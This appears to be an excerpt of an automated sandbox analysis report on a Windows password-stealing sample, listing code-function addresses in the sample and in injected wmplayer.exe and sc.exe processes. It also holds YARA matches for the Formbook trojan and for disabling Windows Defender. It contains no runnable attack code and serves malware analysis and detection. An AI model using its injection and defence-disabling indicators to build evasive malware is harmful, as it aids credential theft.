            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeCode function: 0_2_00007FFD346850B00_2_00007FFD346850B0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeCode function: 0_2_00007FFD346844FC0_2_00007FFD346844FC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeCode function: 0_2_00007FFD3468CA600_2_00007FFD3468CA60
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeCode function: 0_2_00007FFD3468EF490_2_00007FFD3468EF49
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeCode function: 0_2_00007FFD34694F380_2_00007FFD34694F38
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeCode function: 0_2_00007FFD3468BF390_2_00007FFD3468BF39
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeCode function: 0_2_00007FFD34693F620_2_00007FFD34693F62
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeCode function: 0_2_00007FFD346810480_2_00007FFD34681048
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeCode function: 0_2_00007FFD346898280_2_00007FFD34689828
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeCode function: 0_2_00007FFD346898200_2_00007FFD34689820
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeCode function: 0_2_00007FFD346908EA0_2_00007FFD346908EA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeCode function: 0_2_00007FFD34688B380_2_00007FFD34688B38
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeCode function: 0_2_00007FFD346947F90_2_00007FFD346947F9
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeCode function: 0_2_00007FFD347600030_2_00007FFD34760003
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_004030A06_2_004030A0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00402AC06_2_00402AC0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00402AB86_2_00402AB8
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_004023706_2_00402370
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0040FC8A6_2_0040FC8A
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0040FC936_2_0040FC93
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_004165EE6_2_004165EE
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_004165F36_2_004165F3
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0042D6036_2_0042D603
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0040FEB36_2_0040FEB3
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0040DF2B6_2_0040DF2B
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0040DF336_2_0040DF33
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339132D6_2_0339132D
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CD34C6_2_032CD34C
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339A3526_2_0339A352
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0332739A6_2_0332739A
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033A03E66_2_033A03E6
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032EE3F06_2_032EE3F0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033802746_2_03380274
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E52A06_2_032E52A0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033812ED6_2_033812ED
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032FB2C06_2_032FB2C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D01006_2_032D0100
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0337A1186_2_0337A118
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033AB16B6_2_033AB16B
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0331516C6_2_0331516C
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032CF1726_2_032CF172
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033A01AA6_2_033A01AA
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032EB1B06_2_032EB1B0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033981CC6_2_033981CC
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033970E96_2_033970E9
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339F0E06_2_0339F0E0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E70C06_2_032E70C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0338F0CC6_2_0338F0CC
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E07706_2_032E0770
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033047506_2_03304750
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339F7B06_2_0339F7B0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032DC7C06_2_032DC7C0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032FC6E06_2_032FC6E0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033916CC6_2_033916CC
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E05356_2_032E0535
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033975716_2_03397571
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0337D5B06_2_0337D5B0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033A05916_2_033A0591
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339F43F6_2_0339F43F
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D14606_2_032D1460
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033924466_2_03392446
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0338E4F66_2_0338E4F6
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339FB766_2_0339FB76
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339AB406_2_0339AB40
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032FFB806_2_032FFB80
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0331DBF96_2_0331DBF9
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03396BD76_2_03396BD7
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03353A6C6_2_03353A6C
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339FA496_2_0339FA49
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03397A466_2_03397A46
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03325AA06_2_03325AA0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0337DAAC6_2_0337DAAC
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032DEA806_2_032DEA80
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0338DAC66_2_0338DAC6
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F69626_2_032F6962
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E99506_2_032E9950
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032FB9506_2_032FB950
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E29A06_2_032E29A0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_033AA9A66_2_033AA9A6
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0334D8006_2_0334D800
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E28406_2_032E2840
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032EA8406_2_032EA840
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032C68B86_2_032C68B8
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0330E8F06_2_0330E8F0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E38E06_2_032E38E0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03300F306_2_03300F30
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03322F286_2_03322F28
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339FF096_2_0339FF09
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03354F406_2_03354F40
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339FFB16_2_0339FFB1
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E1F926_2_032E1F92
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032ECFE06_2_032ECFE0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D2FC86_2_032D2FC8
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339EE266_2_0339EE26
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E0E596_2_032E0E59
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E9EB06_2_032E9EB0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339CE936_2_0339CE93
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F2E906_2_032F2E90
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339EEDB6_2_0339EEDB
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032EAD006_2_032EAD00
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03397D736_2_03397D73
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03391D5A6_2_03391D5A
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E3D406_2_032E3D40
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032F8DBF6_2_032F8DBF
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032DADE06_2_032DADE0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032FFDC06_2_032FFDC0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03359C326_2_03359C32
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032E0C006_2_032E0C00
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03380CB56_2_03380CB5
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0339FCF26_2_0339FCF2
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_032D0CF26_2_032D0CF2
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0356D34C13_2_0356D34C
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0363A35213_2_0363A352
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0363132D13_2_0363132D
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_036403E613_2_036403E6
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0358E3F013_2_0358E3F0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035C739A13_2_035C739A
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0362027413_2_03620274
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_036212ED13_2_036212ED
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0359B2C013_2_0359B2C0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035852A013_2_035852A0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0364B16B13_2_0364B16B
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0356F17213_2_0356F172
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035B516C13_2_035B516C
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0360815813_2_03608158
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0357010013_2_03570100
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0361A11813_2_0361A118
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_036381CC13_2_036381CC
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_036401AA13_2_036401AA
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0358B1B013_2_0358B1B0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0363F0E013_2_0363F0E0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_036370E913_2_036370E9
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035870C013_2_035870C0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0362F0CC13_2_0362F0CC
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035A475013_2_035A4750
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0358077013_2_03580770
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0357C7C013_2_0357C7C0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0363F7B013_2_0363F7B0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_036316CC13_2_036316CC
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0359C6E013_2_0359C6E0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0363757113_2_03637571
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0358053513_2_03580535
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0361D5B013_2_0361D5B0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0364059113_2_03640591
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0363244613_2_03632446
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0357146013_2_03571460
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0363F43F13_2_0363F43F
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0362E4F613_2_0362E4F6
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0363FB7613_2_0363FB76
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0363AB4013_2_0363AB40
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035BDBF913_2_035BDBF9
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035F5BF013_2_035F5BF0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_03636BD713_2_03636BD7
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0359FB8013_2_0359FB80
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_03637A4613_2_03637A46
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0363FA4913_2_0363FA49
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035F3A6C13_2_035F3A6C
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0362DAC613_2_0362DAC6
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0361DAAC13_2_0361DAAC
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0357EA8013_2_0357EA80
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035C5AA013_2_035C5AA0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0358995013_2_03589950
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0359B95013_2_0359B950
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0359696213_2_03596962
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0364A9A613_2_0364A9A6
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035829A013_2_035829A0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0358284013_2_03582840
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0358A84013_2_0358A840
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035ED80013_2_035ED800
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035AE8F013_2_035AE8F0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035838E013_2_035838E0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035668B813_2_035668B8
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035F4F4013_2_035F4F40
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0363FF0913_2_0363FF09
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035A0F3013_2_035A0F30
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035C2F2813_2_035C2F28
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_03572FC813_2_03572FC8
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0358CFE013_2_0358CFE0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_03581F9213_2_03581F92
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0363FFB113_2_0363FFB1
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_03580E5913_2_03580E59
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0363EE2613_2_0363EE26
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0363EEDB13_2_0363EEDB
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_03592E9013_2_03592E90
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_03589EB013_2_03589EB0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0363CE9313_2_0363CE93
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_03637D7313_2_03637D73
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_03583D4013_2_03583D40
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_03631D5A13_2_03631D5A
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0358AD0013_2_0358AD00
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0359FDC013_2_0359FDC0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0357ADE013_2_0357ADE0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_03598DBF13_2_03598DBF
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_03580C0013_2_03580C00
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_035F9C3213_2_035F9C32
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_0363FCF213_2_0363FCF2
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_03570CF213_2_03570CF2
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_03620CB513_2_03620CB5
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_02E1178013_2_02E11780
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_02E2A2E013_2_02E2A2E0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_02E132CB13_2_02E132CB
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_02E132D013_2_02E132D0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_02E0CB9013_2_02E0CB90
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_02E0C96713_2_02E0C967
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_02E0C97013_2_02E0C970
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_02E0AC0813_2_02E0AC08
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_02E0AC1013_2_02E0AC10
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_033BBB6313_2_033BBB63
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_033BBA4813_2_033BBA48
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_033BAF6813_2_033BAF68
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_033BBEFD13_2_033BBEFD
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_033BBCCB13_2_033BBCCB
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: String function: 0335F290 appears 105 times
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: String function: 032CB970 appears 268 times
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: String function: 03327E54 appears 89 times
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: String function: 03315130 appears 36 times
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: String function: 0334EA12 appears 86 times
            Source: C:\Windows\SysWOW64\sc.exeCode function: String function: 035C7E54 appears 96 times
            Source: C:\Windows\SysWOW64\sc.exeCode function: String function: 035FF290 appears 105 times
            Source: C:\Windows\SysWOW64\sc.exeCode function: String function: 035EEA12 appears 86 times
            Source: C:\Windows\SysWOW64\sc.exeCode function: String function: 035B5130 appears 36 times
            Source: C:\Windows\SysWOW64\sc.exeCode function: String function: 0356B970 appears 268 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1512 -s 1456
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeStatic PE information: No import functions for PE file found
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000000.2091070027.000001DF09F0D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameEtafudeqosubujasugaz6 vs SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2455500615.000001DF0BBB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEzemesefejoF vs SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeBinary or memory string: OriginalFilenameEtafudeqosubujasugaz6 vs SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe
            Source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0.2.SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe.1df0bbf5348.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
            Source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0.2.SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe.1df0bbf5348.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
            Source: 0000000D.00000002.3944875828.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.2322232096.00000000035F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000E.00000002.3948817261.00000000057D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.2321692626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000D.00000002.3945190684.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.3945837611.00000000038C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
